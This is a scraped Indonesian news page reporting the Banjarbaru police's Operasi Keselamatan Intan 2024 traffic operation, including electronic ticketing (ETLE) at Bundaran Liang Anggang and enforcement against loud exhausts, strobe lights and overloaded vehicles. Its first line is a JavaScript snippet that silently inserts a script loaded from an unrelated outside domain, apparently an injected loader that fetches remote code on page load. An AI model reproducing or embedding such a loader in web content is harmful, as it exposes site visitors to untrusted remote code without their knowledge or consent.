(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
HEADLINE

Aktifkan ETLE di Bundaran Liang Anggang, Knalpot Brong dan Lampu Strobo Ditilang


KANALKALIMANTAN.COM, BANJARBARU – Kepolisian Resor Banjarbaru menggelar Operasi Keselamatan Intan 2024 di seluruh wilayah hukum Kota Banjarbaru terhitung mulai 4 hingga 17 Maret 2024.

Operasi Keselamatan Intan 2024 di Kota Banjarbaru, dijelaskan Wakapolres Banjarbaru Kompol Winda Adhiningrum untuk memastikan kedisiplinan masyarakat pengguna jalan dalam mematuhi aturan dan rambu-rambu lalu lintas.

“Kita mengajak masyarakat tertib berlalu lintas, saat keluar rumah diperiksa surat menyuratnya, menggunakan helm, dan menaati peraturan dan rambu-rambu lalu lintas,” ujar Wakapolres Banjarbaru, Kompol Winda Adhiningrum setelah apel pelaksanaan Operasi Keselamatan Intan 2024 di halaman Mapolres Banjarbaru, Sabtu (2/3/2024) pagi.

Baca juga: 37 Orang Jadi Dewan Hakim STQ ke-50 Kabupaten HSU

Menurut Kompol Winda, Satuan Lalu Lintas (Satlantas) Polres Banjarbaru akan mengoptimalkan dan memprioritaskan penindakan pelanggaran dengan sistem tilang statis dan mobile.

Kegiatan operasi tilang ini akan pun dilakukan dengan mengedepankan kegiatan preemtif, preventif, dan persuasif serta humanis.

Apel gelar pasukan Operasi Keselamatan Intan 2024 di halaman Mapolres Banjarbaru, Sabtu (2/3/2024). Foto: wanda

“Jika ada ditemukan di jalan maka akan ditindak dengan peneguran, kemudian tilang menggunakan ETLE dan mobile,” jelas Wakapolres Banjarbaru.

Baca juga: Jokowi Mulai Berkantor di IKN Juli 2024

Kompol Winda menyebutkan ETLE (Electronic Traffic Law Enforcement) atau tilang elektronik yang saat ini sudah diaktifkan pihak kepolisian berada di Jalan Ahmad Yani kawasan Bundaran Liang Anggang.

“Mengingat saat ini kita sudah mengaktifkan ETLE di jalan Ahmad Yani sekitar bundaran Liang Anggang untuk melakukan tilang statis, dan untuk mobile akan dibawa oleh masing-masing petugas lalu lintas,” ungkap Wakapolres.

Satlantas Polres Banjarbaru menurunkan 95 personel yang terlibat untuk menjalankan tugas dan tanggung jawabnya masing-masing.

“Mereka akan patroli melakukan pengaturan di jalan apabila saat pengaturan melihat adanya pelanggaran dari masyarakat bisa ditilang,” sebutnya.

Sasaran Operasi Keselamatan Intan 2024 di Banjarbaru menindak pelanggaran kendaraan bermotor yang over dimensi over load (ODOL), penggunaan lampu strobo yang tidak sesuai dengan peruntukannya, hingga penggunaan sirine yang digunakan tidak pada tempatnya.

Baca juga: Konstruksi Pondasi Tak Kuat, Rumah Dua Lantai di Banjarmasin Ambruk

“Selain itu juga ada penggunaan knalpot yang tidak sesuai spesifikasi teknis, dan lainnya,” tuntas dia.

Dalam apel gelar pasukan ini juga pihak kepolisian menggandeng masyarakat hingga pelajar untuk tertib berlalu lintas dengan melaksanakan ikrar keselamatan berlalu lintas. (Kanalkalimantan.com/wanda)

Reporter: wanda
Editor: bie

 


Risa

Recent Posts

Sekda HSU Sampaikan Raperda Pertanggungjawaban Pelaksanaan APBD 2023, Ini Angka Detailnya

KANALKALIMANTAN.COM, AMUNTAI - Sekretaris Daerah (Sekda) Hulu Sungai Utara (HSU) Adi Lesmana menyebut capaian target… Read More

13 menit ago

Permudah Kebutuhan Transaksi Jemaah Haji di Tanah Suci dengan BRImo

KANALKALIMANTAN.COM- Ibadah haji merupakan salah satu impian bagi umat Islam di seluruh dunia. Agar ibadah… Read More

34 menit ago

Bawaslu Banjarbaru Seleksi Panwascam Hanya di Empat Kecamatan

KANALKALIMANTAN.COM, BANJARBARU - Badan Pengawas Pemilihan Umum (Bawaslu) Kota Banjarbaru tengah merekrut Panitia Pengawas Kecamatan… Read More

54 menit ago

Pemko Banjarbaru Bentuk Tim Desk Pilkada 2024

KANALKALIMANTAN.COM, BANJARBARU - Pemerintah Kota (Pemko) Banjarbaru Provinsi Kalimantan Selatan (Kalsel) membentuk Tim Desk Pilkada… Read More

2 jam ago

Jelang Pilkada 2024, KPU HSU Melantik 50 Anggota PPK

KANALKALIMANTAN.COM, AMUNTAI - Komisi Pemilihan Umum (KPU) Kabupaten Hulu Sungai Utara (HSU) resmi melantik 50… Read More

4 jam ago

Pipa Bocor, Suplai Air Bersih di Banjarmasin Barat dan Tengah Terhenti

KANALKALIMANTAN.COM, BANJARMASIN - Pipa distribusi air bersih milik Perusahaan Air Minum (PAM) Bandarmasih di wilayah… Read More

5 jam ago

This website uses cookies.